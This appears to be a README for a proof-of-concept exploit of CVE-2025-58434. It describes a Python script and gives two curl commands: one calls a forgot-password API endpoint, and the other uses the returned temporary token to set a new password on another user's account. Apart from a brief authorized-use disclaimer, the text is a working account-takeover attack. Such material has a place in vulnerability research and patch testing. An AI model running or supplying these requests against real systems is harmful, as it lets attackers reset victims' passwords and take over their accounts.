
CVE-2025-58434 Proof of Concept
Python proof-of-concept script for triggering POST /api/v1/account/forgot-password.
⚠️ For educational and authorized security research only. Running this tool against systems you do not own or lack written permission to test is illegal.
zaddy6 (Isaac David)arthurgervais (Arthur Gervais)CVE-2025-58434poc.py: prompts for machine URL/IP, optional protocol when bare host/IP used, target email, and password; then sends request and prints HTTP status, headers, and response body similar to curl -iRun:
python3 poc.py
Then provide:
10.10.11.10, http://10.10.11.10, or https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<[email protected]>",
"tempToken":"<tempToken>",
"password":"NewSecurePassword123!"
}
}'